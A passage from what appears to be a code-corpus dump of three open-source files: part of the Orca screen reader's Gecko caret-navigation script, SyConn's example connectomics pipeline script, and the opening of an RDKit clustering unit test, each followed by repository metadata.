if obj and not obj.getState().contains(pyatspi.STATE_FOCUSABLE):
[obj, offset] = self.findFirstCaretContext(obj, offset)
if obj and obj.getState().contains(pyatspi.STATE_FOCUSABLE):
obj.queryComponent().grabFocus()
elif obj:
contents = self.getObjectContentsAtOffset(obj, offset)
# If we don't have anything to say, let's try one more
# time.
#
if len(contents) == 1 and not contents[0][3].strip():
[obj, offset] = self.findNextCaretInOrder(obj, offset)
contents = self.getObjectContentsAtOffset(obj, offset)
self.setCaretPosition(obj, offset)
self.speakContents(contents)
self.updateBraille(obj)
self.inMouseOverObject = True
else:
# Route the mouse pointer where it was before both to "clean up
# after ourselves" and also to get the mouse over object to go
# away.
#
x, y = self.oldMouseCoordinates
eventsynthesizer.routeToPoint(x, y)
self.restorePreMouseOverContext()
def restorePreMouseOverContext(self):
"""Cleans things up after a mouse-over object has been hidden."""
obj, offset = self.preMouseOverContext
if obj and not obj.getState().contains(pyatspi.STATE_FOCUSABLE):
[obj, offset] = self.findFirstCaretContext(obj, offset)
if obj and obj.getState().contains(pyatspi.STATE_FOCUSABLE):
obj.queryComponent().grabFocus()
elif obj:
self.setCaretPosition(obj, offset)
self.speakContents(self.getObjectContentsAtOffset(obj, offset))
self.updateBraille(obj)
self.inMouseOverObject = False
self.lastMouseOverObject = None
def goNextCharacter(self, inputEvent):
"""Positions the caret offset to the next character or object
in the document window.
"""
[obj, characterOffset] = self.getCaretContext()
while obj:
[obj, characterOffset] = self.findNextCaretInOrder(obj,
characterOffset)
if obj and obj.getState().contains(pyatspi.STATE_VISIBLE):
break
if not obj:
[obj, characterOffset] = self.getBottomOfFile()
else:
self.speakCharacterAtOffset(obj, characterOffset)
self.setCaretPosition(obj, characterOffset)
self.updateBraille(obj)
def goPreviousCharacter(self, inputEvent):
"""Positions the caret offset to the previous character or object
in the document window.
"""
[obj, characterOffset] = self.getCaretContext()
while obj:
[obj, characterOffset] = self.findPreviousCaretInOrder(
obj, characterOffset)
if obj and obj.getState().contains(pyatspi.STATE_VISIBLE):
break
if not obj:
[obj, characterOffset] = self.getTopOfFile()
else:
self.speakCharacterAtOffset(obj, characterOffset)
self.setCaretPosition(obj, characterOffset)
self.updateBraille(obj)
def goPreviousWord(self, inputEvent):
"""Positions the caret offset to beginning of the previous
word or object in the document window.
"""
[obj, characterOffset] = self.getCaretContext()
# Make sure we have a word.
#
[obj, characterOffset] = \
self.findPreviousCaretInOrder(obj, characterOffset)
# To be consistent with Gecko's native navigation, we want to move
# to the next (or technically the previous) word start boundary.
#
boundary = pyatspi.TEXT_BOUNDARY_WORD_START
contents = self.getWordContentsAtOffset(obj, characterOffset, boundary)
if not len(contents):
return
[obj, startOffset, endOffset, string] = contents[0]
if len(contents) == 1 \
and endOffset - startOffset == 1 \
and self.getCharacterAtOffset(obj, startOffset) == " ":
# Our "word" is just a space. This can happen if the previous
# word was a mark of punctuation surrounded by whitespace (e.g.
# " | ").
#
[obj, characterOffset] = \
self.findPreviousCaretInOrder(obj, startOffset)
contents = \
self.getWordContentsAtOffset(obj, characterOffset, boundary)
if len(contents):
[obj, startOffset, endOffset, string] = contents[0]
self.setCaretPosition(obj, startOffset)
self.updateBraille(obj)
self.speakMisspelledIndicator(obj, startOffset)
self.speakContents(contents)
def goNextWord(self, inputEvent):
"""Positions the caret offset to the end of next word or object
in the document window.
"""
[obj, characterOffset] = self.getCaretContext()
# Make sure we have a word.
#
characterOffset = max(0, characterOffset)
[obj, characterOffset] = \
self.findNextCaretInOrder(obj, characterOffset)
# To be consistent with Gecko's native navigation, we want to
# move to the next word end boundary.
#
boundary = pyatspi.TEXT_BOUNDARY_WORD_START
contents = self.getWordContentsAtOffset(obj, characterOffset, boundary)
if not (len(contents) and contents[-1][2]):
return
[obj, startOffset, endOffset, string] = contents[-1]
if string and string[-1].isspace():
endOffset -= 1
self.setCaretPosition(obj, endOffset)
self.updateBraille(obj)
self.speakMisspelledIndicator(obj, startOffset)
self.speakContents(contents)
def findPreviousLine(self, obj, characterOffset, updateCache=True):
"""Locates the caret offset at the previous line in the document
window.
Arguments:
-obj: the object from which the search should begin
-characterOffset: the offset within obj from which the search should
begin
-updateCache: whether or not we should update the line cache
Returns the [obj, characterOffset] at the beginning of the line.
"""
if not obj:
[obj, characterOffset] = self.getCaretContext()
if not obj:
return self.getTopOfFile()
currentLine = self.currentLineContents
index = self.findObjectOnLine(obj, characterOffset, currentLine)
if index < 0:
text = self.utilities.queryNonEmptyText(obj)
if text and text.characterCount == characterOffset:
characterOffset -= 1
currentLine = self.getLineContentsAtOffset(obj, characterOffset)
prevObj = currentLine[0][0]
prevOffset = currentLine[0][1]
[prevObj, prevOffset] = \
self.findPreviousCaretInOrder(currentLine[0][0], currentLine[0][1])
extents = self.getExtents(currentLine[0][0],
currentLine[0][1],
currentLine[0][2])
prevExtents = self.getExtents(prevObj, prevOffset, prevOffset + 1)
while self.onSameLine(extents, prevExtents) \
and (extents != prevExtents):
[prevObj, prevOffset] = \
self.findPreviousCaretInOrder(prevObj, prevOffset)
prevExtents = self.getExtents(prevObj, prevOffset, prevOffset + 1)
# If the user did some back-to-back arrowing, we might already have
# the line contents.
#
prevLine = self._previousLineContents
index = self.findObjectOnLine(prevObj, prevOffset, prevLine)
if index < 0:
prevLine = self.getLineContentsAtOffset(prevObj, prevOffset)
if not prevLine:
return [None, -1]
prevObj = prevLine[0][0]
prevOffset = prevLine[0][1]
failureCount = 0
while failureCount < 5 and prevObj and currentLine == prevLine:
# For some reason we're stuck. We'll try a few times by
# caret before trying by object.
#
# print "find prev line failed", prevObj, prevOffset
[prevObj, prevOffset] = \
self.findPreviousCaretInOrder(prevObj, prevOffset)
prevLine = self.getLineContentsAtOffset(prevObj, prevOffset)
failureCount += 1
if currentLine == prevLine:
# print "find prev line still stuck", prevObj, prevOffset
documentFrame = self.utilities.documentFrame()
prevObj = self.findPreviousObject(prevObj, documentFrame)
prevOffset = 0
[prevObj, prevOffset] = self.findNextCaretInOrder(prevObj,
prevOffset - 1)
if not script_settings.arrowToLineBeginning:
extents = self.getExtents(obj,
characterOffset,
characterOffset + 1)
oldX = extents[0]
for item in prevLine:
extents = self.getExtents(item[0], item[1], item[1] + 1)
newX1 = extents[0]
newX2 = newX1 + extents[2]
if newX1 < oldX <= newX2:
newObj = item[0]
newOffset = 0
text = self.utilities.queryNonEmptyText(prevObj)
if text:
newY = extents[1] + extents[3] / 2
newOffset = text.getOffsetAtPoint(oldX, newY, 0)
if 0 <= newOffset <= characterOffset:
prevOffset = newOffset
prevObj = newObj
break
if updateCache:
self._nextLineContents = self.currentLineContents
self.currentLineContents = prevLine
return [prevObj, prevOffset]
def findNextLine(self, obj, characterOffset, updateCache=True):
"""Locates the caret offset at the next line in the document
window.
Arguments:
-obj: the object from which the search should begin
-characterOffset: the offset within obj from which the search should
begin
-updateCache: whether or not we should update the line cache
Returns the [obj, characterOffset] at the beginning of the line.
"""
if not obj:
[obj, characterOffset] = self.getCaretContext()
if not obj:
return self.getBottomOfFile()
currentLine = self.currentLineContents
index = self.findObjectOnLine(obj, characterOffset, currentLine)
if index < 0:
currentLine = self.getLineContentsAtOffset(obj, characterOffset)
[nextObj, nextOffset] = \
self.findNextCaretInOrder(currentLine[-1][0],
currentLine[-1][2] - 1)
extents = self.getExtents(currentLine[-1][0],
currentLine[-1][1],
currentLine[-1][2])
nextExtents = self.getExtents(nextObj, nextOffset, nextOffset + 1)
while self.onSameLine(extents, nextExtents) \
and (extents != nextExtents):
[nextObj, nextOffset] = \
self.findNextCaretInOrder(nextObj, nextOffset)
nextExtents = self.getExtents(nextObj, nextOffset, nextOffset + 1)
# If the user did some back-to-back arrowing, we might already have
# the line contents.
#
nextLine = self._nextLineContents
index = self.findObjectOnLine(nextObj, nextOffset, nextLine)
if index < 0:
nextLine = self.getLineContentsAtOffset(nextObj, nextOffset)
if not nextLine:
return [None, -1]
failureCount = 0
while failureCount < 5 and nextObj and currentLine == nextLine:
# For some reason we're stuck. We'll try a few times by
# caret before trying by object.
#
#print "find next line failed", nextObj, nextOffset
[nextObj, nextOffset] = \
self.findNextCaretInOrder(nextObj, nextOffset)
if nextObj:
nextLine = self.getLineContentsAtOffset(nextObj, nextOffset)
failureCount += 1
if currentLine == nextLine:
#print "find next line still stuck", nextObj, nextOffset
documentFrame = self.utilities.documentFrame()
nextObj = self.findNextObject(nextObj, documentFrame)
nextOffset = 0
# On a page which contains tables which are not only nested, but
# are surrounded by line break characters and/or embedded within
# a paragraph or span, there's an excellent chance that we'll skip
# right over the nested content. See bug #555055. If we can detect
# this condition, we should set the nextOffset to the EOC which
# represents the nested content before findNextCaretInOrder does
# its thing.
#
if nextOffset == 0 \
and self.getCharacterAtOffset(nextObj, nextOffset) == "\n" \
and self.getCharacterAtOffset(nextObj, nextOffset + 1) == \
self.EMBEDDED_OBJECT_CHARACTER:
nextOffset += 1
[nextObj, nextOffset] = \
self.findNextCaretInOrder(nextObj, max(0, nextOffset) - 1)
if not script_settings.arrowToLineBeginning:
extents = self.getExtents(obj,
characterOffset,
characterOffset + 1)
oldX = extents[0]
for item in nextLine:
extents = self.getExtents(item[0], item[1], item[1] + 1)
newX1 = extents[0]
newX2 = newX1 + extents[2]
if newX1 < oldX <= newX2:
newObj = item[0]
newOffset = 0
text = self.utilities.queryNonEmptyText(nextObj)
if text:
newY = extents[1] + extents[3] / 2
newOffset = text.getOffsetAtPoint(oldX, newY, 0)
if newOffset >= 0:
nextOffset = newOffset
nextObj = newObj
break
if updateCache:
self._previousLineContents = self.currentLineContents
self.currentLineContents = nextLine
return [nextObj, nextOffset]
def goPreviousLine(self, inputEvent):
"""Positions the caret offset at the previous line in the document
window, attempting to preserve horizontal caret position.
Returns True if we actually moved.
"""
[obj, characterOffset] = self.getCaretContext()
[prevObj, prevCharOffset] = self.findPreviousLine(obj, characterOffset)
if not prevObj:
return False
[obj, caretOffset] = self.findFirstCaretContext(prevObj, prevCharOffset)
self.setCaretPosition(obj, caretOffset)
self.presentLine(prevObj, prevCharOffset)
return True
def goNextLine(self, inputEvent):
"""Positions the caret offset at the next line in the document
window, attempting to preserve horizontal caret position.
Returns True if we actually moved.
"""
[obj, characterOffset] = self.getCaretContext()
[nextObj, nextCharOffset] = self.findNextLine(obj, characterOffset)
if not nextObj:
return False
[obj, caretOffset] = self.findFirstCaretContext(nextObj, nextCharOffset)
self.setCaretPosition(obj, caretOffset)
self.presentLine(nextObj, nextCharOffset)
return True
def goBeginningOfLine(self, inputEvent):
"""Positions the caret offset at the beginning of the line."""
[obj, characterOffset] = self.getCaretContext()
line = self.getLineContentsAtOffset(obj, characterOffset)
obj, characterOffset = self.findFirstCaretContext(line[0][0], line[0][1])
self.setCaretPosition(obj, characterOffset)
if not isinstance(orca_state.lastInputEvent, input_event.BrailleEvent):
self.speakCharacterAtOffset(obj, characterOffset)
self.updateBraille(obj)
def goEndOfLine(self, inputEvent):
"""Positions the caret offset at the end of the line."""
[obj, characterOffset] = self.getCaretContext()
line = self.getLineContentsAtOffset(obj, characterOffset)
obj, characterOffset = line[-1][0], line[-1][2] - 1
self.setCaretPosition(obj, characterOffset)
if not isinstance(orca_state.lastInputEvent, input_event.BrailleEvent):
self.speakCharacterAtOffset(obj, characterOffset)
self.updateBraille(obj)
def goTopOfFile(self, inputEvent):
"""Positions the caret offset at the beginning of the document."""
[obj, characterOffset] = self.getTopOfFile()
self.setCaretPosition(obj, characterOffset)
self.presentLine(obj, characterOffset)
def goBottomOfFile(self, inputEvent):
"""Positions the caret offset at the end of the document."""
[obj, characterOffset] = self.getBottomOfFile()
self.setCaretPosition(obj, characterOffset)
self.presentLine(obj, characterOffset)
def expandComboBox(self, inputEvent):
"""If focus is on a menu item, but the containing combo box does not
have focus, give the combo box focus and expand it. Note that this
is necessary because with Orca controlling the caret it is possible
to arrow to a menu item within the combo box without actually giving
the containing combo box focus.
"""
[obj, characterOffset] = self.getCaretContext()
comboBox = None
if obj.getRole() == pyatspi.ROLE_MENU_ITEM:
comboBox = self.utilities.ancestorWithRole(
obj, [pyatspi.ROLE_COMBO_BOX], [pyatspi.ROLE_DOCUMENT_FRAME])
else:
index = self.getChildIndex(obj, characterOffset)
if index >= 0:
comboBox = obj[index]
if not comboBox:
return
try:
action = comboBox.queryAction()
except:
pass
else:
orca.setLocusOfFocus(None, comboBox)
comboBox.queryComponent().grabFocus()
for i in range(0, action.nActions):
name = action.getName(i)
# Translators: this is the action name for the 'open' action.
#
if name in ["open", _("open")]:
action.doAction(i)
break
def goPreviousObjectInOrder(self, inputEvent):
"""Go to the previous object in order, regardless of type or size."""
[obj, characterOffset] = self.getCaretContext()
# Work our way out of form lists and combo boxes.
#
if obj and obj.getState().contains(pyatspi.STATE_SELECTABLE):
obj = obj.parent.parent
characterOffset = self.utilities.characterOffsetInParent(obj)
self.currentLineContents = None
characterOffset = max(0, characterOffset)
[prevObj, prevOffset] = [obj, characterOffset]
found = False
mayHaveGoneTooFar = False
line = self.currentLineContents \
or self.getLineContentsAtOffset(obj, characterOffset)
startingPoint = line
useful = self.getMeaningfulObjectsFromLine(line)
while line and not found:
index = self.findObjectOnLine(prevObj, prevOffset, useful)
if not self.utilities.isSameObject(obj, prevObj):
# The question is, have we found the beginning of this
# object? If the offset is 0 or there's more than one
# object on this line and we started on a later line,
# it's safe to assume we've found the beginning.
#
found = (prevOffset == 0) \
or (len(useful) > 1 and line != startingPoint)
# Otherwise, we won't know for certain until we've gone
# to the line(s) before this one and found a different
# object, at which point we may have gone too far.
#
if not found:
mayHaveGoneTooFar = True
obj = prevObj
characterOffset = prevOffset
elif 0 < index < len(useful):
prevObj = useful[index - 1][0]
prevOffset = useful[index - 1][1]
found = (prevOffset == 0) or (index > 1)
if not found:
mayHaveGoneTooFar = True
elif self.utilities.isSameObject(obj, prevObj) \
and 0 == prevOffset < characterOffset:
found = True
if not found:
self._nextLineContents = line
prevLine = self.findPreviousLine(line[0][0], line[0][1])
line = self.currentLineContents
useful = self.getMeaningfulObjectsFromLine(line)
prevObj = useful[-1][0]
prevOffset = useful[-1][1]
if self.currentLineContents == self._nextLineContents:
break
if not found:
self.presentMessage(messages.WRAPPING_TO_BOTTOM)
[prevObj, prevOffset] = self.getBottomOfFile()
line = self.getLineContentsAtOffset(prevObj, prevOffset)
useful = self.getMeaningfulObjectsFromLine(line)
if useful:
prevObj = useful[-1][0]
prevOffset = useful[-1][1]
found = not (prevObj is None)
elif mayHaveGoneTooFar and self._nextLineContents:
if not self.utilities.isSameObject(obj, prevObj):
prevObj = useful[index][0]
prevOffset = useful[index][1]
if found:
self.currentLineContents = line
self.setCaretPosition(prevObj, prevOffset)
self.updateBraille(prevObj)
objectContents = self.getObjectContentsAtOffset(prevObj,
prevOffset)
objectContents = [objectContents[0]]
self.speakContents(objectContents)
def goNextObjectInOrder(self, inputEvent):
"""Go to the next object in order, regardless of type or size."""
[obj, characterOffset] = self.getCaretContext()
# Work our way out of form lists and combo boxes.
#
if obj and obj.getState().contains(pyatspi.STATE_SELECTABLE):
obj = obj.parent.parent
characterOffset = self.utilities.characterOffsetInParent(obj)
self.currentLineContents = None
characterOffset = max(0, characterOffset)
[nextObj, nextOffset] = [obj, characterOffset]
found = False
line = self.currentLineContents \
or self.getLineContentsAtOffset(obj, characterOffset)
while line and not found:
useful = self.getMeaningfulObjectsFromLine(line)
index = self.findObjectOnLine(nextObj, nextOffset, useful)
if not self.utilities.isSameObject(obj, nextObj):
nextObj = useful[0][0]
nextOffset = useful[0][1]
found = True
elif 0 <= index < len(useful) - 1:
nextObj = useful[index + 1][0]
nextOffset = useful[index + 1][1]
found = True
else:
self._previousLineContents = line
[nextObj, nextOffset] = self.findNextLine(line[-1][0],
line[-1][2])
line = self.currentLineContents
if self.currentLineContents == self._previousLineContents:
break
if not found:
self.presentMessage(messages.WRAPPING_TO_TOP)
[nextObj, nextOffset] = self.getTopOfFile()
line = self.getLineContentsAtOffset(nextObj, nextOffset)
useful = self.getMeaningfulObjectsFromLine(line)
if useful:
nextObj = useful[0][0]
nextOffset = useful[0][1]
found = not (nextObj is None)
if found:
self.currentLineContents = line
self.setCaretPosition(nextObj, nextOffset)
self.updateBraille(nextObj)
objectContents = self.getObjectContentsAtOffset(nextObj,
nextOffset)
objectContents = [objectContents[0]]
self.speakContents(objectContents)
def advanceLivePoliteness(self, inputEvent):
"""Advances live region politeness level."""
if _settingsManager.getSetting('inferLiveRegions'):
self.liveMngr.advancePoliteness(orca_state.locusOfFocus)
else:
self.presentMessage(messages.LIVE_REGIONS_OFF)
def monitorLiveRegions(self, inputEvent):
if not _settingsManager.getSetting('inferLiveRegions'):
_settingsManager.setSetting('inferLiveRegions', True)
self.presentMessage(messages.LIVE_REGIONS_MONITORING_ON)
else:
_settingsManager.setSetting('inferLiveRegions', False)
self.liveMngr.flushMessages()
self.presentMessage(messages.LIVE_REGIONS_MONITORING_OFF)
def setLivePolitenessOff(self, inputEvent):
if _settingsManager.getSetting('inferLiveRegions'):
self.liveMngr.setLivePolitenessOff()
else:
self.presentMessage(messages.LIVE_REGIONS_OFF)
def reviewLiveAnnouncement(self, inputEvent):
if _settingsManager.getSetting('inferLiveRegions'):
self.liveMngr.reviewLiveAnnouncement( \
int(inputEvent.event_string[1:]))
else:
self.presentMessage(messages.LIVE_REGIONS_OFF)
def toggleCaretNavigation(self, inputEvent):
"""Toggles between Firefox native and Orca caret navigation."""
if script_settings.controlCaretNavigation:
for keyBinding in self.__getArrowBindings().keyBindings:
self.keyBindings.removeByHandler(keyBinding.handler)
script_settings.controlCaretNavigation = False
string = messages.CARET_CONTROL_GECKO
else:
script_settings.controlCaretNavigation = True
for keyBinding in self.__getArrowBindings().keyBindings:
self.keyBindings.add(keyBinding)
string = messages.CARET_CONTROL_ORCA
debug.println(debug.LEVEL_CONFIGURATION, string)
self.presentMessage(string)
def speakWordUnderMouse(self, acc):
"""Determine if the speak-word-under-mouse capability applies to
the given accessible.
Arguments:
- acc: Accessible to test.
Returns True if this accessible should provide the single word.
"""
if self.inDocumentContent(acc):
try:
ai = acc.queryAction()
except NotImplementedError:
return True
default.Script.speakWordUnderMouse(self, acc)
|
h4ck3rm1k3/orca-sonar
|
src/orca/scripts/toolkits/Gecko/script.py
|
Python
|
lgpl-2.1
| 179,946
|
[
"ORCA"
] |
cde85454020b8b5315d6c148cf3a042744c1138973c509d2bcf2e7cb728f80fe
|
# -*- coding: utf-8 -*-
# SyConn - Synaptic connectivity inference toolkit
#
# Copyright (c) 2016 - now
# Max-Planck-Institute of Neurobiology, Munich, Germany
# Authors: Philipp Schubert, Joergen Kornfeld
import os
import glob
import shutil
import sys
import argparse
import numpy as np
from syconn import global_params
from syconn.handler.config import generate_default_conf, initialize_logging
from syconn.proc.stats import FileTimer
from knossos_utils import knossosdataset
if __name__ == '__main__':
# pare arguments
parser = argparse.ArgumentParser(description='SyConn example run')
parser.add_argument('--working_dir', type=str, default='',
help='Working directory of SyConn')
parser.add_argument('--example_cube', type=str, default='1',
help='Used toy data. Either "1" (400 x 400 x 600) '
'or "2" (1100, 1100, 600).')
parser.add_argument('--log_level', type=str, default='INFO',
help='Level of logging (INFO, DEBUG).')
parser.add_argument('--overwrite', dest='overwrite', action='store_true',
help='Overwrite generated data.')
parser.add_argument('--run_server', help='Run syconn KNOSSOS server after processing.',
dest='run_server', action='store_true')
parser.add_argument('--prior_astrocyte_removal', help='Separate astrocytes from neurons.',
dest='prior_astrocyte_removal', action='store_true')
parser.set_defaults(overwrite=False, run_server=False, prior_astrocyte_removal=False)
args = parser.parse_args()
example_cube_id = int(args.example_cube)
log_level = args.log_level
if args.working_dir == "": # by default use cube dependent working dir
args.working_dir = "~/SyConn/example_cube{}/".format(example_cube_id)
example_wd = os.path.expanduser(args.working_dir) + "/"
# set up basic parameter, log, working directory and config file
experiment_name = 'j0126_example'
log = initialize_logging(experiment_name, log_dir=example_wd + '/logs/')
scale = np.array([10, 10, 20])
key_val_pairs_conf = [
('glia', {'prior_astrocyte_removal': args.prior_astrocyte_removal}),
('use_point_models', True),
('pyopengl_platform', 'egl'), # 'osmesa' or 'egl'
('batch_proc_system', None), # None, 'SLURM' or 'QSUB'
('ncores_per_node', 20),
('mem_per_node', 250000),
('ngpus_per_node', 2),
('nnodes_total', 4),
('cell_contacts',
{'generate_cs_ssv': False, # cs_ssv: contact site objects between cells
'min_path_length_partners': None,
}),
('skeleton', {'use_kimimaro': True}),
('log_level', log_level),
# these will be created during synapse type prediction (
# exec_dense_prediction.predict_synapsetype()), must also be uncommented!
# ('paths', {'kd_sym': f'{example_wd}/knossosdatasets/syntype_v2/',
# 'kd_asym': f'{example_wd}/knossosdatasets/syntype_v2/'}),
('cell_objects',
{
# first remove small fragments, close existing holes, then erode to trigger watershed segmentation
'extract_morph_op': {'mi': ['binary_opening', 'binary_closing', 'binary_erosion', 'binary_erosion',
'binary_erosion'],
'sj': ['binary_opening', 'binary_closing'],
'vc': ['binary_opening', 'binary_closing', 'binary_erosion']}
}
),
('meshes', {'meshing_props_points':
{'cs_ssv': dict(depth=11, vertex_size=20, voxel_size_simplify=20),
'syn_ssv': dict(depth=11, vertex_size=20, voxel_size_simplify=20)}}
)
]
if example_cube_id == 1:
chunk_size = (256, 256, 256)
elif example_cube_id == 2:
chunk_size = (256, 256, 256)
else:
chunk_size = (512, 512, 256)
n_folders_fs = 100
n_folders_fs_sc = 100
for curr_dir in [os.path.dirname(os.path.realpath(__file__)) + '/',
os.path.abspath(os.path.curdir) + '/',
os.path.abspath(os.path.curdir) + '/SyConnData',
os.path.abspath(os.path.curdir) + '/SyConn',
os.path.expanduser('~/SyConnData/'),
os.path.expanduser('~/SyConn/')]:
h5_dir = curr_dir + '/data{}/'.format(example_cube_id)
if os.path.isdir(h5_dir):
break
if not os.path.isdir(h5_dir):
raise FileNotFoundError(f'Example data folder could not be found'
f' at "{curr_dir}".')
if not os.path.isfile(h5_dir + 'seg.h5') or len(glob.glob(h5_dir + '*.h5')) != 7\
or not os.path.isfile(h5_dir + 'neuron_rag.bz2'):
raise FileNotFoundError(f'Incomplete example data in folder "{h5_dir}".')
if not (sys.version_info[0] == 3 and sys.version_info[1] >= 6):
log.critical('Python version <3.6. This is untested!')
# keep imports here to guarantee the correct usage of pyopengl platform if batch processing
# system is None
from syconn.exec import exec_init, exec_syns, exec_render, exec_dense_prediction, exec_inference, exec_skeleton
from syconn.handler.compression import load_from_h5py
# PREPARE TOY DATA
generate_default_conf(example_wd, scale, key_value_pairs=key_val_pairs_conf,
force_overwrite=True)
if global_params.config.working_dir is not None and global_params.config.working_dir != example_wd:
msg = f'Active working directory is already set to "{example_wd}". Aborting.'
log.critical(msg)
raise RuntimeError(msg)
os.makedirs(example_wd, exist_ok=True)
global_params.wd = example_wd
log.info(f'Step 0/9 - Preparation')
ftimer = FileTimer(example_wd + '/.timing.pkl')
ftimer.start('Preparation')
# copy models to working directory
if os.path.isdir(curr_dir + '/models/') and not os.path.isdir(example_wd + '/models/'):
shutil.copytree(curr_dir + '/models', example_wd + '/models/')
os.makedirs(example_wd + '/glia/', exist_ok=True)
# check model existence
for mpath_key in ['mpath_spiness', 'mpath_syn_rfc', 'mpath_celltype_e3',
'mpath_axonsem', 'mpath_glia_e3', 'mpath_myelin',
'mpath_tnet']:
mpath = getattr(global_params.config, mpath_key)
if not (os.path.isfile(mpath) or os.path.isdir(mpath)):
raise ValueError('Could not find model "{}". Make sure to copy the'
' "models" folder into the current working '
'directory "{}".'.format(mpath, example_wd))
if not args.prior_astrocyte_removal:
shutil.copy(h5_dir + "/neuron_rag.bz2", global_params.config.init_svgraph_path)
else:
shutil.copy(h5_dir + "/rag.bz2", global_params.config.init_svgraph_path)
tmp = load_from_h5py(h5_dir + 'sj.h5', hdf5_names=['sj'])[0]
offset = np.array([0, 0, 0])
bd = np.array(tmp.shape)
del tmp
# INITIALIZE DATA
if not os.path.isdir(global_params.config.kd_sj_path):
kd = knossosdataset.KnossosDataset()
kd.initialize_from_matrix(global_params.config.kd_seg_path, scale, experiment_name,
offset=offset, boundary=bd, fast_downsampling=True,
data_path=h5_dir + 'raw.h5', mags=[1, 2, 4], hdf5_names=['raw'])
seg_d = load_from_h5py(h5_dir + 'seg.h5', hdf5_names=['seg'])[0].swapaxes(0, 2) # xyz -> zyx
kd.save_seg(offset=offset, mags=[1, 2, 4], data=seg_d, data_mag=1)
del kd, seg_d
kd_sym = knossosdataset.KnossosDataset()
kd_sym.initialize_from_matrix(global_params.config.kd_sym_path, scale, experiment_name,
offset=offset, boundary=bd, fast_downsampling=True,
data_path=h5_dir + 'sym.h5', mags=[1, 2], hdf5_names=['sym'])
del kd_sym
kd_asym = knossosdataset.KnossosDataset()
kd_asym.initialize_from_matrix(global_params.config.kd_asym_path, scale,
experiment_name, offset=offset, boundary=bd,
fast_downsampling=True, data_path=h5_dir + 'asym.h5',
mags=[1, 2], hdf5_names=['asym'])
del kd_asym
kd_mi = knossosdataset.KnossosDataset()
kd_mi.initialize_from_matrix(global_params.config.kd_mi_path, scale, experiment_name,
offset=offset, boundary=bd, fast_downsampling=True,
data_path=h5_dir + 'mi.h5', mags=[1, 2], hdf5_names=['mi'])
del kd_mi
kd_vc = knossosdataset.KnossosDataset()
kd_vc.initialize_from_matrix(global_params.config.kd_vc_path, scale, experiment_name,
offset=offset, boundary=bd, fast_downsampling=True,
data_path=h5_dir + 'vc.h5', mags=[1, 2], hdf5_names=['vc'])
del kd_vc
kd_sj = knossosdataset.KnossosDataset()
kd_sj.initialize_from_matrix(global_params.config.kd_sj_path, scale, experiment_name,
offset=offset, boundary=bd, fast_downsampling=True,
data_path=h5_dir + 'sj.h5', mags=[1, 2], hdf5_names=['sj'])
del kd_sj
ftimer.stop()
log.info(f'Finished example cube initialization (shape: {bd}). Starting SyConn pipeline.')
log.info('Example data will be processed in "{}".'.format(example_wd))
# START SyConn
log.info('Step 1/9 - Predicting sub-cellular structures')
ftimer.start('Dense predictions')
exec_dense_prediction.predict_myelin()
ftimer.stop()
log.info('Step 2/9 - Creating SegmentationDatasets (incl. SV meshes)')
ftimer.start('SD generation')
exec_init.init_cell_subcell_sds(chunk_size=chunk_size, n_folders_fs=n_folders_fs,
n_folders_fs_sc=n_folders_fs_sc, overwrite=args.overwrite)
exec_init.run_create_rag()
ftimer.stop()
log.info('Step 3/9 - Astrocyte separation')
if global_params.config.prior_astrocyte_removal:
ftimer.start('Astrocyte separation')
if not global_params.config.use_point_models:
exec_render.run_astrocyte_rendering()
exec_inference.run_astrocyte_prediction()
else:
exec_inference.run_astrocyte_prediction_pts()
exec_inference.run_astrocyte_splitting()
ftimer.stop()
else:
log.info('Astrocyte separation disabled. Skipping.')
log.info('Step 4/9 - Creating SuperSegmentationDataset')
ftimer.start('SSD generation')
exec_init.run_create_neuron_ssd(overwrite=args.overwrite)
ftimer.stop()
log.info('Step 5/9 - Skeleton generation')
ftimer.start('Skeleton generation')
exec_skeleton.run_skeleton_generation(map_myelin=True)
ftimer.stop()
log.info('Step 6/9 - Synapse detection')
ftimer.start('Synapse detection')
exec_syns.run_syn_generation(chunk_size=chunk_size, n_folders_fs=n_folders_fs_sc, overwrite=args.overwrite)
ftimer.stop()
log.info('Step 6.5/9 - Contact detection')
ftimer.start('Contact detection')
if global_params.config['cell_contacts']['generate_cs_ssv']:
exec_syns.run_cs_ssv_generation(n_folders_fs=n_folders_fs_sc, overwrite=args.overwrite)
else:
log.info('Cell-cell contact detection ("cs_ssv" objects) disabled. Skipping.')
ftimer.stop()
if not (global_params.config.use_onthefly_views or global_params.config.use_point_models):
log.info('Extra step - Neuron rendering')
ftimer.start('Neuron rendering')
exec_render.run_neuron_rendering()
ftimer.stop()
log.info('Step 7/9 - Compartment prediction')
ftimer.start('Compartment predictions')
exec_inference.run_semsegaxoness_prediction()
if not global_params.config.use_point_models:
exec_inference.run_semsegspiness_prediction()
exec_syns.run_spinehead_volume_calc()
ftimer.stop()
log.info('Step 8/9 - Cell-morphology embeddings')
ftimer.start('Morphology extraction')
exec_inference.run_morphology_embedding()
ftimer.stop()
log.info('Step 9/9 - Celltype analysis')
ftimer.start('Celltype analysis')
exec_inference.run_celltype_prediction()
ftimer.stop()
log.info('Step - Matrix export')
ftimer.start('Matrix export')
exec_syns.run_matrix_export()
ftimer.stop()
time_summary_str = ftimer.prepare_report()
log.info(time_summary_str)
if args.run_server:
log.info('Setting up flask server for inspection. Annotated cell reconstructions and wiring '
'can be analyzed via the KNOSSOS-SyConn plugin at '
'`SyConn/scripts/kplugin/syconn_knossos_viewer.py`.')
os.system(f'syconn.server --working_dir={example_wd} --port=10001')
|
StructuralNeurobiologyLab/SyConn
|
examples/start.py
|
Python
|
gpl-2.0
| 13,097
|
[
"NEURON"
] |
dc155c310ad810c4c19f89dac4897e757abaec5a7d3ef0d97abaf97708975ccb
|
# $Id$
#
# Copyright (C) 2001-2008 greg Landrum and Rational Discovery LLC
#
# @@ All Rights Reserved @@
# This file is part of the RDKit.
# The contents are covered by the terms of the BSD license
# which is included in the file license.txt, found at the root
# of the RDKit source tree.
#
"""unit testing code for clustering
"""
import unittest
import numpy
from rdkit.ML.Cluster import ClusterUtils
from rdkit.ML.Cluster import Clusters
from rdkit.TestRunner import redirect_stdout
from io import StringIO
from rdkit.ML.Cluster import Murtagh
class TestCase(unittest.TestCase):
def setUp(self):
# this is the data set used by Romesburg in "Cluster Analysis for Researchers"
# to demonstrate the different clustering methods
# print '\n%s: '%self.shortDescription(),
self.d = numpy.array([[10., 5.], [20., 20.], [30., 10.], [30., 15.], [5., 10.]])
self.names = ['p1', 'p2', 'p3', 'p4', 'p5']
def testDivide(self):
" tests the cluster division algorithms "
ca = Clusters.Cluster(index=1)
cb = Clusters.Cluster(index=2)
